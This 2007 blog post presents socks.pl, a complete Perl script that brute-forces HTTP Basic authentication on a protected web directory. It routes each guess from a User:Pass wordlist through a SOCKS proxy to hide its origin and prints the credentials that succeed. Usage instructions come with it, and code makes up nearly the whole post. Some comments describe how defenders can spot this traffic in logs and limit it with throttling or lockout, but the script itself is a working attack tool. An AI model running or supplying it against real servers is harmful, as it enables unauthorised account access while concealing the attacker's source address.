Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a Perl script that connects to a SOCKS proxy and tries every user and password in the given file against a protected web directory.

Modules needed: IO::Socket::Socks, MIME::Base64 and Getopt::Std

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC1945

use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;
use strict;

# Parse the command line into the configuration hash used by the rest of the
# script.
#
# At least twelve entries are expected in @ARGV (six switches, each with a
# value). Switches and the keys they populate:
#   -s => PServer   -p => PPort   -i => SIP
#   -P => SPort     -d => Sdir    -f => IDfile
# A key is set only when its switch was supplied. A short argument list or a
# getopts() failure hands the usage text to printError().
#
# Returns the configuration as a flat key/value list.
sub setOpts {
    my $usage = "Error on use $0 -s Proxy Server -d Protected File -f User and Password File -p proxyport -i Web Server IP -P Web Server Port";

    # Command-line switch => configuration key.
    my %key_for = (
        s => 'PServer',
        p => 'PPort',
        i => 'SIP',
        P => 'SPort',
        d => 'Sdir',
        f => 'IDfile',
    );

    my %configHash;

    if (scalar(@ARGV) < 12) {
        printError($usage);
    }
    else {
        my %switches;
        getopts('s:p:f:d:i:P:', \%switches) or printError($usage);

        for my $flag (keys %key_for) {
            next unless defined($switches{$flag});
            $configHash{ $key_for{$flag} } = $switches{$flag};
        }
    }

    return %configHash;
}

# Open a new connection to the web server through the SOCKS proxy.
#
# Reads PServer/PPort (proxy endpoint) and SIP/SPort (destination) from the
# configuration, stores the resulting IO::Socket::Socks handle under 'sock'
# and returns the updated configuration as a flat key/value list.
# Dies with $! when the constructor returns a false value.
sub connectProxy {
    my %configHash = @_;

    my $handle = IO::Socket::Socks->new(
        ProxyAddr   => $configHash{'PServer'},
        ProxyPort   => $configHash{'PPort'},
        ConnectAddr => $configHash{'SIP'},
        ConnectPort => $configHash{'SPort'},
    ) or die($!);

    $configHash{'sock'} = $handle;
    return %configHash;
}

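# Report a fatal error and stop the script.
#
#   $_[0] - message text; a newline is appended before it goes to STDERR.
#
# Exits with status 1 so a calling shell or wrapper can tell that the run
# failed; a bare exit() would report success.
sub printError {
    my ($errorMsg) = @_;

    print STDERR $errorMsg . "\n";
    exit(1);
}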

# Abort through printError() unless the given path is an existing regular
# file (-f test).
#
#   $_[0] - path of the "User:Pass" list passed with -f.
sub checkFile {
    my ($fileName) = @_;

    if (!-f $fileName) {
        printError("Please check file $fileName");
    }
}

# Open the credential list named by the IDfile key for reading.
#
# The file is attached to the package-level bareword handle USER, which
# logIN() reads from later; nothing is returned to the caller for it.
# An open() failure is reported through printError() together with $!.
sub loadFile {
    my %configHash = @_;

    my $listPath = $configHash{'IDfile'};
    open(USER, '<', $listPath)
        or printError("$! on file $configHash{'IDfile'}");
}


# Base64-encode the current "User:Pass" string for an HTTP Basic
# Authorization header.
#
# Reads the userInfo key and stores the encoded form under encUserPass.
# encode_base64() is called with its default line ending, so the stored value
# ends with a newline. Base64 is an encoding, not encryption: anyone who can
# observe the request can recover the credentials.
#
# Returns the updated configuration as a flat key/value list.
sub convUserPass {
    my %settings = @_;

    my $credential = $settings{'userInfo'};
    $settings{'encUserPass'} = encode_base64($credential);

    return %settings;
}

# Try each "User:Pass" line read from the USER handle (opened by loadFile)
# against the path stored under Sdir.
#
# For every line a fresh proxied connection is opened with connectProxy(),
# the line is chomped and Base64-encoded by convUserPass(), and one HTTP/1.0
# GET carrying an "Authorization: Basic" header is written to the socket.
# The first 15 bytes of the reply are read, and the credential line is
# printed to STDOUT only when they equal 'HTTP/1.1 200 OK' exactly.
#
# Detection notes for anyone reviewing server logs: each attempt arrives on
# its own TCP connection from the proxy's address, always carries
# "Host: localhost", and ends its lines with a bare LF rather than CRLF.
# A burst of 401 responses with that shape points at this kind of guessing;
# per-account throttling or lockout bounds it even when the source address
# changes.
sub logIN {
    my %configHash = @_;

    while (<USER>) {
        %configHash = connectProxy(%configHash);

        my $entry = $_;
        chomp($entry);
        $configHash{'userInfo'} = $entry;
        %configHash = convUserPass(%configHash);

        my $socks   = $configHash{'sock'};
        my $request = join('',
            "GET ", $configHash{'Sdir'},
            " HTTP/1.0\nHost: localhost\nAuthorization: Basic ",
            $configHash{'encUserPass'},
            "\n\n");
        print {$socks} $request;

        # Only the status line prefix is inspected.
        my $rsp;
        $socks->read($rsp, 15);

        if ($rsp eq 'HTTP/1.1 200 OK') {
            print $configHash{'userInfo'} . "\n";
        }
    }
}

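# Close the proxied connection held in the configuration.
#
# Takes the configuration as a flat key/value list. When a handle is stored
# under 'sock' it is closed and the key is removed, so the returned
# configuration no longer refers to a dead socket. No new connection is
# opened: calling ->close() on connectProxy()'s return value would act on the
# flattened configuration hash, not on the socket.
#
# Returns the updated configuration as a flat key/value list.
sub closeProxy {
    my %configHash = @_;

    my $handle = delete $configHash{'sock'};
    $handle->close() if defined($handle);

    return %configHash;
}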

# Script entry point: parse the options, verify and open the credential
# list, then run the attempt loop over it.
sub init {
    my %settings = setOpts();

    # Fail early on a missing list before the USER handle is opened.
    checkFile($settings{'IDfile'});
    loadFile(%settings);

    logIN(%settings);
}

init();
